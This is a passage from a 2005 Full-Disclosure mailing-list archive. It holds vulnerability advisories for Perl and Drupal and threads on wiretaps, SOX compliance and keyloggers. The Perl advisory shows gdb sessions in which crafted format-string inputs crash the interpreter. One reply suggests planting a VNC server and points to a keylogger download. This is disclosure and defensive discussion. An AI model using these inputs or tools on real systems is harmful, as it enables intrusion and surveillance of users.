http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6-1ubuntu1.1_amd64.deb Size/MD5: 85086 e894b1b0168138fdb46d0c55095252bf http://security.ubuntu.com/ubuntu/pool/universe/i/ipsec-tools/racoon_0.6-1ubuntu1.1_amd64.deb Size/MD5: 326258 1e7da4aa300a082cdf8034639de4f0a0 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6-1ubuntu1.1_i386.deb Size/MD5: 78912 b46dd5373458dd5500b2513edc6ceec8 http://security.ubuntu.com/ubuntu/pool/universe/i/ipsec-tools/racoon_0.6-1ubuntu1.1_i386.deb Size/MD5: 298016 5df2e64e0ac064876aa21d29c086f902 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6-1ubuntu1.1_powerpc.deb Size/MD5: 86902 c7c905f335db1bae382af11fe659d335 http://security.ubuntu.com/ubuntu/pool/universe/i/ipsec-tools/racoon_0.6-1ubuntu1.1_powerpc.deb Size/MD5: 319518 1a7abc7fd9645d47d045f63d9f980528 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051201/03f21573/attachment.bin From chromazine at sbcglobal.net Thu Dec 1 14:14:13 2005 From: chromazine at sbcglobal.net (Steve Kudlak) Date: Thu, 01 Dec 2005 06:14:13 -0800 Subject: AW: [Full-disclosure] Clever crooks can foil wiretaps, security flawin tap technology In-Reply-To: <003501c5f670$3b8f1510$0b00a8c0@mainpc> References: <003501c5f670$3b8f1510$0b00a8c0@mainpc> Message-ID: <438F0535.2050501@sbcglobal.net> Roland Ruf wrote: >Cool stuff.. *lol* > >I do not think, that the FBI is still using this old analogue recorders in >Total recording mode connected to the analogue extensions... > >That may have worked 10 or 15 years ago depending on many things like the >connection type, the way the recorder detects the signal, etc, but I assume >only some single manufactures could have that problem... If you record >extension site on analogue extensions and you use the line sense as >recording trigger (which is default on many recorders), that thing with the >CTONE would not have worked... And we do not talk about the digital lines, >where the recording trigger is normally absolutely independent from the >audio of that call. > >Regards > >Roland > >coderman wrote, > > > >>heheheh >> >>http://seattlepi.nwsource.com/national/250215_wiretap30.html >> >> >//snip > > >>The tone, also known as a C-tone, sounds like a low buzzing and >>is "slightly annoying," >> >> > >Obtaining a snooping order based on the fact that this C-tone was >detected should be easy. Did you know that escaped prisoners in >bright orange outfits are difficult to spot in public? > >&:-) > > >-- >Disclaimer: by reading this disclaimer, you agree not to read it >again. >_______________________________________________ >Full-Disclosure - We believe in it. >Charter: http://lists.grok.org.uk/full-disclosure-charter.html >Hosted and sponsored by Secunia - http://secunia.com/ > >_______________________________________________ >Full-Disclosure - We believe in it. >Charter: http://lists.grok.org.uk/full-disclosure-charter.html >Hosted and sponsored by Secunia - http://secunia.com/ > > > Oh I dunno, the other thing is that local law enforcement might be better and worse off. Sometimes they go and get stuff from Radio Shack other times they just accept stuff from the FBI or some other agency and assume it works. They often get hand me downs. The FBI is in real trouble with technology. I mean if you think of the hacker heros, they were often caught by sloppiness which cooler and more xperienced folks might get around. This is why law enforcement uses a lot of bluster and tells folks they have done things when they haven't. They feel the guilty will confess. Truly irritating if you haven't been doing anything. Trying to say the FBI doesn't have a technology problem is kind of a tad questionable. They do. The main problem is they are still run by the old guy cxriminal division. You'd be surprised at what priomative equipment they use sometimes. So if one wanted to foil them then yes you'd try stuff and hope it would work. Or you'd use a buy and go cell phone with no real name. It's possible to get those and if you have money to burn it might be a good thing. Of course if you are an old style "I don't want a surviellence state no matter how safe the panoptiocn supposedlyt makes me" might try all these things out of spite evedn when doing nothing wrong. Have Fun, Sends Steve P.S. I dunno want equipment is used in Europe and South Africa but sometimes the enfocement agencies tend to have better. If you live in the US you get used to pretty dumb policemen and enforcement authorities who catch dumb criminals and blunder into the lives of innocent citizen and make a mess, and want to say "Oh Opps! Our job is hard you got to understand..." and get out of any reprecussions. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051201/18cca5d3/attachment.html From mmadison at fnni.com Thu Dec 1 14:36:02 2005 From: mmadison at fnni.com (Madison, Marc) Date: Thu, 1 Dec 2005 08:36:02 -0600 Subject: [Full-disclosure] Re: SOX whistleblowers' clause Compliance Message-ID: IANAL, But IMO use an Intranet web page that allows employees to submit anonymous html post to the web server via html. Now if your security policy is pervasive then surely auditing is enabled on all your systems, thus removing any anonymity this would have provided. Have you considered, dare I say, outsourcing? I only say this since part of the requirement calls for the company to provide sufficient anonymity to individuals reporting issues. By the way the SOX whistleblowers requirements have already been challenged in court so there might be precedence on what is sufficient. Aditya Deshmukh [aditya.deshmukh at online.gateway.strangled.net] wrote: >If you read the last line in para 6 you will find that anon mailbox is a requirement for SOX compliance. >And mailbox was ment for email Michael :) >But I think that "with a post and some concrete" mailbox will be Indeed be far more secure..... From ccarpenter at dswa.net Thu Dec 1 15:38:35 2005 From: ccarpenter at dswa.net (Christopher Carpenter) Date: Thu, 1 Dec 2005 08:38:35 -0700 Subject: [Full-disclosure] Hacking Boot camps! Message-ID: <78744869705CEF41A32C103C5C04F2200163A824@phxexc1.dswa.net> Yeah, and if you didn't register V-X after like 90 days, it formatted your hard drive. Imagine if an application tried that today. -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of MH Sent: Wednesday, November 30, 2005 11:53 PM To: full-disclosure at lists.grok.org.uk Subject: RE: [Full-disclosure] Hacking Boot camps! Pfft.. RENEGADE all the way :> WWIV was great for modding too. Vision-X, yep.. I remember a lot of the 'ansi cool-kids' (or whatever...) running that. -MH On Wed, 30 Nov 2005, Christopher Carpenter wrote: > > Don't forget WWIV and Vision-X. :) > > > WildCAT BBS Anyone???? :) > > I remember playing tradewars and calling who knows where to get new text > files :) > > Used Tone-loC a lot more back then :) > > JP _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ From robert at dyadsecurity.com Thu Dec 1 08:58:36 2005 From: robert at dyadsecurity.com (robert at dyadsecurity.com) Date: Thu, 1 Dec 2005 00:58:36 -0800 Subject: [Full-disclosure] Perl format string integer wrap vulnerability Message-ID: <20051201085836.GE28337@5002.rapturesecurity.org> SUMMARY. perl suffers from an integer wrap overflow inside the explicit parameter format string functionality, this has been confirmed to be a vector for remote code execution. Date Found: September 23, 2005. Public Release: TBD. Application: perl Credit: Jack Louis of Dyad Security BACKGROUND. perl is a cross-platform scripting language. for more details see Perl.org DESCRIPTION. Value over INT_MAX(value of I) inside explicit parameter format string (%I$n) causes integer wrap in the efix (32bit signed integer) variable inside the function Perl_sv_vcatpvfn (see example 1) (sv.c:~9360). Allowing for a write value anywhere in memory exploitation vector (see example 2). Further, heap corruption itself is possible (see example 3), as are more exotic non-reliable $PC redirection (see example 4). From what we have seen the first exploitation method is the only valid one. ImmunitySec has found a generic method of controlling the first condition with a good amount of robustness and success. Perl itself is not directly vulnerable to remote attacks due to this flaw, however any perl program with format string vulnerabilities is. The vulnerability is not to limited DoS (as reported previously) but remote code execution as well as information leakage and DoS. IMPACT. Perl itself is not generally impacted by this vulnerability, but programs with format string vulnerabilities (Dyad Security has confirmed that several programs available at this time have this specific issue) can be vulnerable to remote code execution. Information about creating a robust generic exploit is forthcoming, so public knowledge of exploitation methods for this issue is in the cards. AFFECTED VERSIONS. Perl 5.9.2 and perl 5.8.6 have been tested and found to be vulnerable on linux, freebsd, dragonflybsd on the ia32 platform. It is assumed that a much larger range of software and platforms are also affected, as the sv.c seems to remain seemingly static over time, however this is not confirmed. EXAMPLE 1. $ gdb myperl/bin/perl5.8.7 GNU gdb 6.3 Copyright 2004 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i686-pc-linux-gnu"...Using host libthread_db library "/lib/tls/libthread_db.so.1". (gdb) break sv.c:9232 Breakpoint 1 at 0x80c0df0: file sv.c, line 9232. (gdb) set args -e 'printf("%2147483647\$n");' (gdb) run Breakpoint 1, Perl_sv_vcatpvfn (sv=0x812d180, pat=0x0, patlen=0, args=0x0, svargs=0x8133080, svmax=0, maybe_tainted=0xbffb72cb "") at sv.c:9232 9232 in sv.c (gdb) p efix $1 = 2147483647 (gdb) set args -e 'printf("%2147483648\$n");' (gdb) run Breakpoint 1, Perl_sv_vcatpvfn (sv=0x812d180, pat=0x80000000
, patlen=0, args=0x0, svargs=0x8133080, svmax=0, maybe_tainted=0xbfb0640b "") at sv.c:9232 9232 in sv.c (gdb) p efix $2 = -2147483648 (gdb) cont Modification of a read-only value attempted at -e line 1. Program exited with code 0377. (gdb) set args -e 'printf("%2147483649\$n");' (gdb) run Breakpoint 1, Perl_sv_vcatpvfn (sv=0x812d180, pat=0x80000001
, patlen=0, args=0x0, svargs=0x8133080, svmax=0, maybe_tainted=0xbfe69b9b "") at sv.c:9232 9232 in sv.c (gdb) p efix $3 = -2147483647 (gdb) cont Program received signal SIGSEGV, Segmentation fault. Perl_sv_setiv (sv=0x0, i=0) at sv.c:1652 1652 in sv.c (gdb) bt #0 Perl_sv_setiv (sv=0x0, i=0) at sv.c:1652 #1 0x080b6349 in Perl_sv_setuv_mg (sv=0x0, u=0) at sv.c:1743 #2 0x080c0e06 in Perl_sv_vcatpvfn (sv=0x812d180, pat=0x80000001
, patlen=0, args=0x0, svargs=0x8133080, svmax=0, maybe_tainted=0xbfe69b9b "") at sv.c:9232 #3 0x080e923b in Perl_do_sprintf (sv=0x812d180, len=1, sarg=0x813307c) at doop.c:713 #4 0x080de48a in Perl_pp_prtf () at pp_sys.c:1489 #5 0x080ad038 in Perl_runops_standard () at run.c:37 #6 0x080615c7 in S_run_body (oldscope=1) at perl.c:2000 #7 0x080613ff in perl_run (my_perl=0x812d008) at perl.c:1919 #8 0x0805e61f in main (argc=3, argv=0xbfe69da4, env=0xbfe69db4) at perlmain.c:98 (gdb) x/i $eip 0x80b61a8 : mov 0x8(%ebx),%edx (gdb) i r ebx edx ebx 0x0 0 edx 0x812d180 135451008 (gdb) EXAMPLE 2. #0 Perl_sv_setiv (sv=0x815f821, i=0) at sv.c:2184 2184 SvIVX(sv) = i; (gdb) x/i $eip 0x80c815c : mov %esi,0xc(%eax) EXAMPLE 3. #0 0xb7e69fb0 in malloc_consolidate () from /lib/tls/libc.so.6 EXAMPLE 4. #0 0x09010e50 in ?? () FIXES. Due to the information that has already been leaked we moved up the release date of this advisory. There is no official fix for this issue as of yet. We have provided a sample patch for the 5.9.2 version. See http://www.dyadsecurity.com/perl-0002.html for additional information and a link to the patch. SPECIAL THANKS. Special thanks to Dave Aitel and Bas Alberts of ImmunitySec for the donation of resources and leading the difficult phase of exploit verification research. If you wish to obtain any exploits or further detailed information regarding this vulnerability, please contact ImmunitySec. LEGAL NOTICES. Copyright (C) 2005 Dyad Security, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of Dyad Security, Inc. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email advisoryreprint at dyadsecurity.com for permission. DISCLAIMER. The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. SEE ALSO. http://www.dyadsecurity.com/webmin-0001.html From uwe at hermann-uwe.de Thu Dec 1 15:45:49 2005 From: uwe at hermann-uwe.de (Uwe Hermann) Date: Thu, 1 Dec 2005 16:45:49 +0100 Subject: [Full-disclosure] [DRUPAL-SA-2005-007] Drupal 4.6.4 / 4.5.6 fixes XSS issue Message-ID: <20051201154549.GA18510@aragorn> ---------------------------------------------------------------------------- Drupal security advisory DRUPAL-SA-2005-007 ---------------------------------------------------------------------------- Advisory ID: DRUPAL-SA-2005-007 Project: Drupal core Date: 2005-11-30 Security risk: less critical Impact: normal Where: from remote Vulnerability: XSS ---------------------------------------------------------------------------- Description ----------- Ahmed Saad has brought to our attention a creative way to enter malicious HTML content. Upon further investigation we found that interpretation of broken HTML/SGML and various quirks in interpretation of correctly formed, but non-sensical attribute values by various browsers also allows entering malicious HTML content. These can lead to XSS attacks. XSS can lead to theft of accounts and services, user tracking, misinformation... Versions affected ----------------- Drupal 4.5.0, 4.5.1, 4.5.2, 4.5.3, 4.5.4, 4.5.5 Drupal 4.6.0, 4.6.1, 4.6.2, 4.6.3 Solution -------- - If you are running Drupal 4.5.x, then upgrade to Drupal 4.5.6. - If you are running Drupal 4.6.x, then upgrade to Drupal 4.6.4. Important notes --------------- We have developed a new XSS filtering system based on Ulf Harnhammar's kses library http://sourceforge.net/projects/kses/ . This filtering only happens for Filtered HTML content so if you are trusting a user to access the Full HTML input format then said user can enter malicious content, so please revise your input format settings. Filtered HTML now filters the style attribute unconditionally. And finally, filter writers can access this mechanism through the new filter_xss() function. Contact ------- The security contact for Drupal can be reached at security at drupal.org or using the form at http://drupal.org/contact. More information is available from http://drupal.org/security or from our security RSS feed http://drupal.org/security/rss.xml. // Uwe Hermann, on behalf of the Drupal Security Team. -- Uwe Hermann http://www.hermann-uwe.de | http://www.crazy-hacks.org http://www.it-services-uh.de | http://www.phpmeat.org http://www.unmaintained-free-software.org | http://www.holsham-traders.de -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051201/a272a068/attachment.bin From uwe at hermann-uwe.de Thu Dec 1 15:45:58 2005 From: uwe at hermann-uwe.de (Uwe Hermann) Date: Thu, 1 Dec 2005 16:45:58 +0100 Subject: [Full-disclosure] [DRUPAL-SA-2005-008] Drupal 4.6.4 / 4.5.6 fixes XSS and HTTP header injection issue Message-ID: <20051201154558.GB18510@aragorn> ---------------------------------------------------------------------------- Drupal security advisory DRUPAL-SA-2005-008 ---------------------------------------------------------------------------- Advisory ID: DRUPAL-SA-2005-008 Project: Drupal core Date: 2005-11-30 Security risk: less critical Impact: normal Where: from remote Vulnerability: XSS, HTTP header injection ---------------------------------------------------------------------------- Description ----------- Paul Laudanski informed us that it's possible to attach files that are able to run Javascript under Internet Explorer. Further investigation of the problem revealed that the same method can be used to inject arbitrary HTTP headers. Versions affected ----------------- Drupal 4.5.0, 4.5.1, 4.5.2, 4.5.3, 4.5.4, 4.5.5 Drupal 4.6.0, 4.6.1, 4.6.2, 4.6.3 Solution -------- - If you are running Drupal 4.5.x, then upgrade to Drupal 4.5.6. - If you are running Drupal 4.6.x, then upgrade to Drupal 4.6.4. Contact ------- The security contact for Drupal can be reached at security at drupal.org or using the form at http://drupal.org/contact. More information is available from http://drupal.org/security or from our security RSS feed http://drupal.org/security/rss.xml. // Uwe Hermann, on behalf of the Drupal Security Team. -- Uwe Hermann http://www.hermann-uwe.de | http://www.crazy-hacks.org http://www.it-services-uh.de | http://www.phpmeat.org http://www.unmaintained-free-software.org | http://www.holsham-traders.de -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051201/771f39ae/attachment.bin From uwe at hermann-uwe.de Thu Dec 1 15:46:14 2005 From: uwe at hermann-uwe.de (Uwe Hermann) Date: Thu, 1 Dec 2005 16:46:14 +0100 Subject: [Full-disclosure] [DRUPAL-SA-2005-009] Drupal 4.6.4 / 4.5.6 fixes minor access control issue Message-ID: <20051201154614.GC18510@aragorn> ---------------------------------------------------------------------------- Drupal security advisory DRUPAL-SA-2005-009 ---------------------------------------------------------------------------- Advisory ID: DRUPAL-SA-2005-009 Project: Drupal core Date: 2005-11-30 Security risk: not critical Impact: normal Where: from remote Vulnerability: bypass access control ---------------------------------------------------------------------------- Description ----------- Andrew Widdowson informed us that it's possible to bypass the 'access user profile' permission if the server is running PHP5. No data can be changed though. Versions affected ----------------- Drupal 4.6.0, 4.6.1, 4.6.2, 4.6.3 Solution -------- - If you are running Drupal 4.6.x and PHP5, then upgrade to Drupal 4.6.4. Contact ------- The security contact for Drupal can be reached at security at drupal.org or using the form at http://drupal.org/contact. More information is available from http://drupal.org/security or from our security RSS feed http://drupal.org/security/rss.xml. // Uwe Hermann, on behalf of the Drupal Security Team. -- Uwe Hermann http://www.hermann-uwe.de | http://www.crazy-hacks.org http://www.it-services-uh.de | http://www.phpmeat.org http://www.unmaintained-free-software.org | http://www.holsham-traders.de -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051201/d8f95ab0/attachment.bin From wilder_jeff at msn.com Thu Dec 1 16:11:35 2005 From: wilder_jeff at msn.com (wilder_jeff Wilder) Date: Thu, 01 Dec 2005 09:11:35 -0700 Subject: [Full-disclosure] Re: SOX whistleblowers' clause Compliance In-Reply-To: Message-ID: Can some please send me the actual regulation that states or validates the comments of http://www.nonprofitrisk.org/nwsltr/archive/employprac091005-p.htm ? I am in this very situation right now. -Jeff Wilder CISSP,CCE,C/EH -----BEGIN GEEK CODE BLOCK----- Version: 3.1 GIT/CM/CS/O d- s:+ a C+++ UH++ P L++ E- w-- N+++ o-- K- w O- M-- V-- PS+ PE- Y++ PGP++ t+ 5- X-- R* tv b++ DI++ D++ G e* h--- r- y+++* ------END GEEK CODE BLOCK------ >From: "Aditya Deshmukh" >Reply-To: adityad2005 at users.sourceforge.net >To: "'InfoSecBOFH'" >CC: full-disclosure at lists.grok.org.uk >Subject: RE: [Full-disclosure] Re: SOX whistleblowers' clause Compliance >Date: Thu, 1 Dec 2005 11:36:10 +0530 >MIME-Version: 1.0 >Received: from lists.grok.org.uk ([195.184.125.51]) by >bay0-mc7-f4.bay0.hotmail.com with Microsoft SMTPSVC(6.0.3790.211); Wed, 30 >Nov 2005 22:20:01 -0800 >Received: from lists.grok.org.uk (localhost [127.0.0.1])by >lists.grok.org.uk (Postfix) with ESMTP id D0597A1C;Thu, 1 Dec 2005 >06:19:51 +0000 (GMT) >Received: from Online.GateWay.TechnoPagans.COM (unknown [220.224.19.31])by >lists.grok.org.uk (Postfix) with ESMTP id CA6009C8for >;Thu, 1 Dec 2005 06:19:04 +0000 (GMT) >Received: from c5 (localhost [127.0.0.1])by Online.GateWay.Strangled.NET >with ESMTP (Mailtraq/2.7.1.1894) idONLN2AF3A0C3; Thu, 01 Dec 2005 11:36:12 >+0530 >X-Message-Info: JGTYoYF78jGGLGElHpjcGS/5PgtYfJvSs6ruuz19gQA= >X-Original-To: full-disclosure at lists.grok.org.uk >Delivered-To: full-disclosure at lists.grok.org.uk >Organization: Enterprise Security Solutions >X-Mailer: Microsoft Office Outlook 11 >X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106 >Thread-Index: AcX1/vYkXiB6TIi0ToWrzUWPg4XoCgAPLSow >X-Hops: 1 >X-BeenThere: full-disclosure at lists.grok.org.uk >X-Mailman-Version: 2.1.5 >Precedence: list >List-Id: An unmoderated mailing list for the discussion of security >issues >List-Unsubscribe: >, > >List-Archive: >List-Post: >List-Help: >List-Subscribe: >, > >Errors-To: full-disclosure-bounces at lists.grok.org.uk >Return-Path: full-disclosure-bounces at lists.grok.org.uk >X-OriginalArrivalTime: 01 Dec 2005 06:20:03.0962 (UTC) >FILETIME=[445375A0:01C5F63F] > > > Seeing how my question was ignored. I will tell you the answer. > > > > There is no requirement in SOX to do this. > >Why cant you use google to find out this ? >------------------------------------------------------------------- >http://www.nonprofitrisk.org/nwsltr/archive/employprac091005-p.htm > >*In the para 4* >"Protecting whistleblowers is an essential component of an ethical >and open work environment." > >*In para 6* <----- this is the one that you want >"Provide Employees Multiple Avenues to Report Concerns" > > While employees will hopefully feel comfortable raising concerns > directly with their supervisors, many employees are reluctant to > raise concerns with line management for fear of retaliation, > especially where their concerns pertain to unethical or illegal > conduct by their line managers. Therefore, nonprofits should provide > several options for employees to raise concerns, including the > option of raising a concern anonymously. >------------------------------------------------------------------- >If you read the last line in para 6 you will find that anon mailbox >is a requirement for SOX compliance. > >And mailbox was ment for email Michael :) > >But I think that "with a post and some concrete" mailbox will be >Indeed be far more secure..... > > > >________________________________________________________________________ >Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) >_______________________________________________ >Full-Disclosure - We believe in it. >Charter: http://lists.grok.org.uk/full-disclosure-charter.html >Hosted and sponsored by Secunia - http://secunia.com/ From mmadison at fnni.com Thu Dec 1 16:18:22 2005 From: mmadison at fnni.com (Madison, Marc) Date: Thu, 1 Dec 2005 10:18:22 -0600 Subject: [Full-disclosure] Re: SOX whistleblowers' clause Compliance Message-ID: Google "sox whistleblowers" = hard work But let me help you, http://www.whistleblowers.org/html/sox_whistleblower_statute.htm jeff Wilder wrote: >Can some please send me the actual regulation that states or validates the comments of >http://www.nonprofitrisk.org/nwsltr/archive/employprac091005-p.htm ? >I am in this very situation right now. From sjohnston at cavionplus.com Thu Dec 1 17:24:50 2005 From: sjohnston at cavionplus.com (Shannon Johnston) Date: Thu, 01 Dec 2005 10:24:50 -0700 Subject: [Full-disclosure] Most common keystroke loggers? Message-ID: <1133457890.12950.80.camel@localhost> Hi All, I'm looking for input on what you all believe the most common keystroke loggers are. I've been challenged to write an authentication method (for a web site) that can be secure while using a compromised system. Thanks, Shannon From foofus at foofus.net Thu Dec 1 17:55:36 2005 From: foofus at foofus.net (foofus at foofus.net) Date: Thu, 1 Dec 2005 11:55:36 -0600 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <1133457890.12950.80.camel@localhost> References: <1133457890.12950.80.camel@localhost> Message-ID: <20051201175536.GB9386@foofus.net> On Thu, Dec 01, 2005 at 10:24:50AM -0700, Shannon Johnston wrote: > I'm looking for input on what you all believe the most common keystroke > loggers are. I've been challenged to write an authentication method (for > a web site) that can be secure while using a compromised system. I can think of authentication methods that work (i.e., provide acceptably reliable assurance that the user is who he/she claims to be, without giving an eavesdropper the means to impersonate the user in future authentication transactions) under these conditions. I can't think of a way of providing any assurance that actions taken in the user's name are authentic representations of the user's intentions (i.e., a way of ensuring that requests made on the user's behalf are legitimate) if the user's system is compromised. Is that part of the challenge? --Foofus. From very at unprivate.com Thu Dec 1 17:53:02 2005 From: very at unprivate.com (Very Unprivate Software) Date: Thu, 1 Dec 2005 18:53:02 +0100 Subject: [Full-disclosure] Most common keystroke loggers? References: <1133457890.12950.80.camel@localhost> Message-ID: <01c201c5f6a0$13263b00$0200a8c0@DORKA> Since the purpose is showing that the authentication method is "safe" even on a compromised system (hm, hm...) the keystroke logger doesn't have to be common, the point is to show that the system is "under control". For that, just plant a vnc server, with that you can even do a nifty presentation. If you still want to combine this with a keylogger, an example of a simple and freeware one is at www.zorro.hu/sc-kl/ Can I ask what the authentication is about? greets, php0t ----- Original Message ----- From: "Shannon Johnston" To: Sent: Thursday, December 01, 2005 6:24 PM Subject: [Full-disclosure] Most common keystroke loggers? > Hi All, > I'm looking for input on what you all believe the most common keystroke > loggers are. I've been challenged to write an authentication method (for > a web site) that can be secure while using a compromised system. > > Thanks, > Shannon > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ From Valdis.Kletnieks at vt.edu Thu Dec 1 17:57:16 2005 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Thu, 01 Dec 2005 12:57:16 -0500 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: Your message of "Thu, 01 Dec 2005 10:24:50 MST." <1133457890.12950.80.camel@localhost> References: <1133457890.12950.80.camel@localhost> Message-ID: <200512011757.jB1HvHmn021363@turing-police.cc.vt.edu> On Thu, 01 Dec 2005 10:24:50 MST, Shannon Johnston said: > I'm looking for input on what you all believe the most common keystroke > loggers are. I've been challenged to write an authentication method (for > a web site) that can be secure while using a compromised system. Forget it. You can't do it without going to two-factor authentication, *and* make sure that the second factor is *not* subvertible by the compromised system (for instance, even a SecureID won't totally work, because the keystroke logger can snarf what the user entered, use that to formulate a bogus request, and then issue the user's actual request, which should get rejected as a replay attack). Using crypto all the way from the web server to a smart-card (so all the compromised system can see is encrypted data it can't get the key for) can help yere. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 226 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051201/67a84e59/attachment.bin From foofus at foofus.net Thu Dec 1 18:04:57 2005 From: foofus at foofus.net (foofus at foofus.net) Date: Thu, 1 Dec 2005 12:04:57 -0600 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <200512011757.jB1HvHmn021363@turing-police.cc.vt.edu> References: <1133457890.12950.80.camel@localhost> <200512011757.jB1HvHmn021363@turing-police.cc.vt.edu> Message-ID: <20051201180457.GC9386@foofus.net> On Thu, Dec 01, 2005 at 12:57:16PM -0500, Valdis.Kletnieks at vt.edu wrote: > Forget it. You can't do it without going to two-factor authentication, > *and* make sure that the second factor is *not* subvertible by the > compromised system (for instance, even a SecureID won't totally work, > because the keystroke logger can snarf what the user entered, use that > to formulate a bogus request, and then issue the user's actual request, > which should get rejected as a replay attack). But note that this is not an *authentication* problem: SecurID did offer reliable evidence that the user in question was indeed present at the computer in question at the time of the request. If the challenge is just to provide safe authentication, this plan works: the user is authentic. It's the content of the request that's bogus, which is a subtly different issue. > Using crypto all the > way from the web server to a smart-card (so all the compromised system > can see is encrypted data it can't get the key for) can help yere. You sure? :) --Foofus. From BlueBoar at thievco.com Thu Dec 1 18:44:31 2005 From: BlueBoar at thievco.com (Blue Boar) Date: Thu, 01 Dec 2005 10:44:31 -0800 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <1133457890.12950.80.camel@localhost> References: <1133457890.12950.80.camel@localhost> Message-ID: <438F448F.402@thievco.com> Shannon Johnston wrote: > Hi All, > I'm looking for input on what you all believe the most common keystroke > loggers are. I've been challenged to write an authentication method (for > a web site) that can be secure while using a compromised system. I don't think that's possible for all compromise situations, given today's desktop OS software. It might be possible with a Palladium-like system (and you trust that the secure side isn't compromised) and/or a hardware assist that doesn't trust the host OS (think small USB-attached computer on a stick.) However, given your query, if you simply want to play the known-threats game, you can just require that the Client have up-to-date AV and antispyware software, and scans clean. That's a little orthogonal to the issue of trying to be secure in the face of a keylogger installed, but probably a better thing to shoot for. If, for some reason, you only care about the case where a "keylogger" is installed, then you can go with some scheme like making the user pick numbers of a randomly-scrambled keypad on the screen, with the mouse. Note, however, that "keyloggers" that grab some portion of the screen surrounding the mouse pointer every time you click have already been observed in the wild. They are designed to specifically defeat this kind of mechanism. BB From sopiaz57 at gmail.com Thu Dec 1 18:46:54 2005 From: sopiaz57 at gmail.com (Mike Jones) Date: Thu, 01 Dec 2005 13:46:54 -0500 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <20051201180457.GC9386@foofus.net> References: <1133457890.12950.80.camel@localhost> <200512011757.jB1HvHmn021363@turing-police.cc.vt.edu> <20051201180457.GC9386@foofus.net> Message-ID: <438F451E.4080506@gmail.com> Whats up with www.zorro.hu/sc-kl/ I download the .dll file to my desktop along with the .exe and they dissapear. Strange. Dos dosent show them, either does attrib. foofus at foofus.net wrote: >On Thu, Dec 01, 2005 at 12:57:16PM -0500, Valdis.Kletnieks at vt.edu wrote: > > >>Forget it. You can't do it without going to two-factor authentication, >>*and* make sure that the second factor is *not* subvertible by the >>compromised system (for instance, even a SecureID won't totally work, >>because the keystroke logger can snarf what the user entered, use that >>to formulate a bogus request, and then issue the user's actual request, >>which should get rejected as a replay attack). >> >> > >But note that this is not an *authentication* problem: SecurID did >offer reliable evidence that the user in question was indeed present >at the computer in question at the time of the request. > >If the challenge is just to provide safe authentication, this plan >works: the user is authentic. It's the content of the request that's >bogus, which is a subtly different issue. > > > >>Using crypto all the >>way from the web server to a smart-card (so all the compromised system >>can see is encrypted data it can't get the key for) can help yere. >> >> > >You sure? :) > >--Foofus. > >_______________________________________________ >Full-Disclosure - We believe in it. >Charter: http://lists.grok.org.uk/full-disclosure-charter.html >Hosted and sponsored by Secunia - http://secunia.com/ > > > From sopiaz57 at gmail.com Thu Dec 1 18:55:47 2005 From: sopiaz57 at gmail.com (Mike Jones) Date: Thu, 01 Dec 2005 13:55:47 -0500 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <01c201c5f6a0$13263b00$0200a8c0@DORKA> References: <1133457890.12950.80.camel@localhost> <01c201c5f6a0$13263b00$0200a8c0@DORKA> Message-ID: <438F4733.6020709@gmail.com> Haha disregard my previous post, forgot to disable my AV program. Thinks it's a trojan. Very Unprivate Software wrote: > > Since the purpose is showing that the authentication method is "safe" > even on a compromised system (hm, hm...) the keystroke logger doesn't > have to be common, the point is to show that the system is "under > control". For that, just plant a vnc server, with that you can even do > a nifty presentation. If you still want to combine this with a > keylogger, an example of a simple and freeware one is at > www.zorro.hu/sc-kl/ > > Can I ask what the authentication is about? > > greets, > php0t > > > ----- Original Message ----- From: "Shannon Johnston" > > To: > Sent: Thursday, December 01, 2005 6:24 PM > Subject: [Full-disclosure] Most common keystroke loggers? > > >> Hi All, >> I'm looking for input on what you all believe the most common keystroke >> loggers are. I've been challenged to write an authentication method (for >> a web site) that can be secure while using a compromised system. >> >> Thanks, >> Shannon >> _______________________________________________ >> Full-Disclosure - We 